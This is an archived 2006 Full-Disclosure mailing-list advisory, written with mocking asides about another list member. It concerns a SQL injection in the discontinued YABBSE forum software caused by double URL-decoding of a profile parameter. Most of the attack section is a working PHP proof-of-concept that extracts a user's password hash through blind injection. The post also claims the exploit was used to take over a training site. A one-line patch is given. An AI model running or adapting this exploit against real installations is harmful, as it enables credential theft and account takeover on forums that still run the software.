[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] NDSD-06-001
From:       "Sam Thomas" <Sam.Thomas () aquaterra ! org>
Date:       2006-06-23 0:43:50
Message-ID: 2438A048A42E974E954C41696816D4893F991C () exchange ! aquaterra ! org
[Download RAW message or body]

Hey str0ke - Are you the same str0ke whose code I've been ripping, damn I guess I \
better release my first N3td3v Sponsering Disclosure.....

NDSD-06-001: YABBSE SQL Injection
June 23, 2006

-- Sponsered post

http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046903.html

-- Affected Vendor:
The YABB SE Team

-- Affected Products:
YABBSE (This product is discontinued, but unfortunately still seems to be in \
mainstream use)

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary SQL on vulnerable \
installations of the YABBSE message board. 

The specific flaw exists within the "profile.php" php script which is used to give \
access to user profiles.

-- Vendor Response:The vendor for this product essentially no longer exists. It is \
recommended that you move to a supported message board.

-- Disclosure Timeline:
2005.06.26 - Vulnerabiliity Discovered
2005.06.27 - Vendor found to have discontinued support
2006.06.23 - Public release of advisory

-- Vulnerability

The vulnerability exists where the user supplied variable $user is processed by the \
urldecode() function twice, this allows for the %2527 (decodes to %27 decodes to ') \
SQL injection technique.

- Exploit

The following PoC exploit can be used to retrieve any users (IE admin) password hash \
which in turn can be used to immitate and login as that user:

**BEGIN PoC Code

<?php
/* 
 yabbse exploit

 all versions - product discontinued

 most of the code ripped from http://www.milw0rm.com/exploits/1036 \
                <http://www.milw0rm.com/exploits/1036>  so credit to str0ke and \
                milkw0rm
*/

$server = "www.uberhacker.com <http://www.uberhacker.com> ";
$user="Dozix007"
$port = 80;

$hash = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
        $idx = 0;
        $found = false;

        while( !($found) ) {
                $letter = substr($hex, $idx, 1);

                /* %2527 translates to %27, which gets past magic quotes. This is \
                translated to ' by urldecode. */
                $url="/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527" \
. $letter;  $header = getHeader($server, $port, $url, "");
                if(!preg_match("/An Error Has Occurred/",$header) ) {
                        echo $i . ": " . $letter . "\n";
                        $found = true;
                        $hash .= $letter;
                } else {
                        $idx++;
                }
        }
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
        $ip = gethostbyname($server);
        $fp = fsockopen($ip, $port);

        if (!$fp) {
                return "Unknown";
        } else {
                $com = "GET $file HTTP/1.1\r\n";
                $com .= "Host: $server:$port\r\n";
                $com .= "Connection: close\r\n";
                $com .= "\r\n";

                fputs($fp, $com);
   
   $header="";

                do {
                        $header.= fread($fp, 512);
                } while( !preg_match('/\r\n\r\n$/',$header) );
        }

        return $header;
}
?>
// jazzy2fives 2005-07-26 - mostly stolen from milw0rm.com [2005-06-08] 

** End PoC Code

-- Patch

It is recomended that if you insist on continuing the use of this product, you remove \
the line which reads "$user = urldecode($user);" from all functions in \
"\sources\proflie.php"

-- Credit:

This vulnerability was discovered by me! 

-- About N3td3v Sponsoring Disclosures:

Established by me, n3td3v sponsering disclosures (NDSD) is a system established to \
reward n3td3v for his (her?) posts to full disclosure which bring me more amusement \
than any 0-day possibly could. 

The NDSD is unique in how vulnerability information sponsers the incompetency of \
n3td3v, for each amusing n3td3v post NDSD will attempt to release a disclosure of a \
previously unknown lame exploit. This is because most valid complaints aginst n3td3v \
claim that (s/)he contributes nothing to the secutiy comunity. The aim of NDSD is to \
sponser n3td3v posts thus ensuring that each directly corresponds to a positve \
contribution to FULL-DISCLOSURE.

-- Misc

For anyone interested, this was the exploit used to hijack www.uberhacker.com \
<http://www.uberhacker.com>  - a legal hacker trainng site, which had as their \
primary challenge to hijack the website. The site has since had the majority of it's \
content removed.

NDSD are a subsidiary of empty vessels (www.emptyvessels.org.uk \
<http://www.emptyvessels.org.uk> ), one day we might get our website up.



***********************************************************************************

For more information about Aquaterra Leisure, see www.aquaterra.org

To shop for speedo or polar at bargain prices, see www.aquashop.org

***********************************************************************************


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic